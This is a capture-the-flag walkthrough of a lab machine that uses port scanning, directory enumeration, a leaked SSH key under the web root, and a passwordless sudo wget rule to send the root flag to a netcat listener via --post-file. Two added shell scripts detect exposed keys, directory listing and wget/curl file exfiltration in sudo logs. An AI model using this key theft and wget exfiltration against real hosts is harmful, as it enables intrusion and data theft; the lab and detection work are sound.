Nmap

First we scan all TCP ports, with version detection and the default scripts enabled:

# nmap -p- -T4 -sV -sC 10.10.224.110 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 18:20 BST
Nmap scan report for 10.10.224.110
Host is up (0.021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
|   256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
|_  256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.68 seconds

Website

Looking at the website, it appears to be the standard Apache holding page; however, looking closer at the page source there is an HTML comment giving away a potential username.

Running gobuster against the site finds a directory called sitemap. This hosts a basic website, so we run gobuster again against it:

# gobuster dir -u http://10.10.224.110/sitemap/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.224.110/sitemap/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.ssh                 (Status: 301) [Size: 321] [--> http://10.10.224.110/sitemap/.ssh/]
/css                  (Status: 301) [Size: 320] [--> http://10.10.224.110/sitemap/css/]
/fonts                (Status: 301) [Size: 322] [--> http://10.10.224.110/sitemap/fonts/]
/images               (Status: 301) [Size: 323] [--> http://10.10.224.110/sitemap/images/]
/index.html           (Status: 200) [Size: 21080]
/js                   (Status: 301) [Size: 319] [--> http://10.10.224.110/sitemap/js/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

This scan reveals another directory called .ssh and, because directory listing is enabled, looking inside it we can see what looks like an SSH private key.
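As an added defender-side example (not part of this write-up), the POSIX shell script below checks an Apache document root for the two things that made this foothold possible: private key material sitting under the web root, and directory listing being switched on. The document root, the Apache config fragment and the placeholder key file it creates are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original write-up: audit an Apache document
# root for SSH key material that a directory-enumeration scan would find, and
# report whether directory listing (Options Indexes) is enabled.
# Every path and file content below is constructed for the demonstration.

# List files under DOCROOT that look like private keys, either by name
# (id_*, *.pem, *.key, anything inside a .ssh directory) or by the PEM /
# OpenSSH header that every private key carries. One path per line, deduplicated.
find_exposed_keys() {
    docroot="$1"
    {
        find "$docroot" -type f \( -name 'id_rsa' -o -name 'id_dsa' -o -name 'id_ecdsa' \
            -o -name 'id_ed25519' -o -name '*.pem' -o -name '*.key' -o -path '*/.ssh/*' \) 2>/dev/null
        # grep exits 1 when nothing matches; that is not an error here
        grep -rl -- '-----BEGIN .*PRIVATE KEY-----' "$docroot" 2>/dev/null || true
    } | sort -u
}

# Number of exposed key files, handy for scripting an alert threshold.
count_exposed_keys() {
    find_exposed_keys "$1" | wc -l | tr -d ' '
}

# Exit 0 if the given Apache config enables directory listing for any
# directory: an Options line carrying "Indexes", "+Indexes" or "All".
# "Options -Indexes" does not match, which is the setting you want.
indexes_enabled() {
    grep -Eq '^[[:space:]]*Options([[:space:]]+[^[:space:]]+)*[[:space:]]+(All|\+?Indexes)([[:space:]]|$)' "$1"
}

# --- demonstration on a constructed document root ---------------------------
demo_root=$(mktemp -d)
mkdir -p "$demo_root/sitemap/.ssh" "$demo_root/sitemap/css"
printf '<html>It works</html>\n' > "$demo_root/index.html"
printf 'body { color: #000; }\n' > "$demo_root/sitemap/css/style.css"
# Constructed placeholder, not a real key: only the header matters to the check
printf -- '-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER-NOT-A-REAL-KEY\n-----END OPENSSH PRIVATE KEY-----\n' \
    > "$demo_root/sitemap/.ssh/id_rsa"

# Constructed Apache fragment mirroring the stock Ubuntu default for /var/www/
demo_conf="$demo_root/apache2.conf"
printf '<Directory /var/www/>\n\tOptions Indexes FollowSymLinks\n\tAllowOverride None\n</Directory>\n' > "$demo_conf"

echo "Exposed key files under $demo_root:"
find_exposed_keys "$demo_root"
if indexes_enabled "$demo_conf"; then
    echo "WARNING: directory listing enabled in $demo_conf (set 'Options -Indexes')"
fi
rm -rf "$demo_root"
```

Run it as-is to see the demo, or point the two functions at a live box (`find_exposed_keys /var/www/html`, `indexes_enabled /etc/apache2/apache2.conf`). Note that the stock Ubuntu apache2.conf ships with `Options Indexes FollowSymLinks` for /var/www/, which is exactly why a stray .ssh directory under the web root is browsable.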

SSH

Using this downloaded key we can SSH to the box as the user found earlier (jessie) and get the user flag.

# ssh jessie@10.10.224.110 -i id_rsa
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


8 packages can be updated.
8 updates are security updates.

Last login: Sat Aug  2 20:44:11 2025 from 10.11.18.78
jessie@CorpOne:~$ ls
Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  Videos
jessie@CorpOne:~$ ls */*
Documents/user_flag.txt
jessie@CorpOne:~$ cat Documents/user_flag.txt 
05****************************f6

Privilege Escalation

Checking Jessie's sudo permissions we can see they can run wget as root without needing to provide a password. A lookup on GTFOBins shows that wget's --post-file option will read any file as root and send it to a listener, which gives us a way to extract the root flag.

jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

jessie@CorpOne:~$ sudo wget --post-file=/root/root_flag.txt http://10.11.18.78
--2025-08-02 21:02:23--  http://10.11.18.78/
Connecting to 10.11.18.78:80... connected.
HTTP request sent, awaiting response... No data received.
# nc -lvnp 80  
listening on [any] 80 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.224.110] 45464
POST / HTTP/1.1
User-Agent: Wget/1.17.1 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 10.11.18.78
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

b1****************************3d
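As an added defender-side example (not part of this write-up), the POSIX shell script below contains two checks for the weakness used above: one parses `sudo -l` output and lists every command a user may run as another user without a password, the other scans syslog-style sudo lines for wget or curl being run as root with an option that reads or writes a local file. The `sudo -l` text and the auth.log excerpt embedded in it are constructed; the first auth.log line is how sudo would have logged the --post-file command from the session above.

```shell
#!/bin/sh
# Added example, not part of the original write-up. Two defender-side checks
# for the NOPASSWD wget entry shown above:
#   1. nopasswd_commands        - parse "sudo -l" output and list every command
#                                  a user can run as another user without a password
#   2. flag_sudo_file_transfers - scan syslog-style sudo lines for wget/curl run
#                                  as root with an option that reads or writes a
#                                  local file (--post-file, -O, -T, ...)
# The sample texts below are constructed; the first mirrors the sudo -l output
# and the wget command from the session above.

# stdin: "sudo -l" output. stdout: "<runas> <command list>" per NOPASSWD line.
nopasswd_commands() {
    grep 'NOPASSWD:' \
    | sed -E 's/^[[:space:]]*\(([^:) ]+)[^)]*\)[[:space:]]*NOPASSWD:[[:space:]]*/\1 /'
}

# stdin: /var/log/auth.log (or journalctl -t sudo) lines. stdout: lines where
# wget or curl ran as root and was pointed at a local file. Matching is on the
# COMMAND= field only, so a plain download with no file option is not reported.
flag_sudo_file_transfers() {
    grep -E 'sudo:.*USER=root ; COMMAND=/usr/bin/(wget|curl)[[:space:]]' \
    | grep -E -- '(--post-file|--output-document|--input-file|--upload-file|--output|--data(-binary)?[[:space:]]+@|[[:space:]]-[OiTo]([[:space:]]|/))'
}

# Constructed "sudo -l" output (matches what jessie saw above).
SUDO_L_SAMPLE='User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget'

# Constructed auth.log excerpt: line 1 is how sudo would have logged the
# --post-file command above, lines 2 and 3 are benign root-level commands.
AUTH_LOG_SAMPLE='Aug  2 21:02:23 CorpOne sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root_flag.txt http://10.11.18.78
Aug  2 21:05:10 CorpOne sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget https://example.invalid/update.tar.gz
Aug  2 21:06:01 CorpOne sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/apt-get update'

echo "== NOPASSWD entries =="
printf '%s\n' "$SUDO_L_SAMPLE" | nopasswd_commands
echo "== sudo file transfers in auth.log =="
printf '%s\n' "$AUTH_LOG_SAMPLE" | flag_sudo_file_transfers || true
```

On a real host, feed the functions live data instead: `sudo -l -U jessie | nopasswd_commands` and `grep 'sudo:' /var/log/auth.log | flag_sudo_file_transfers`. The fix for the entry itself is to remove the NOPASSWD wget rule; wget is one of the binaries GTFOBins documents precisely because an unrestricted sudo grant on it is equivalent to root file read and write.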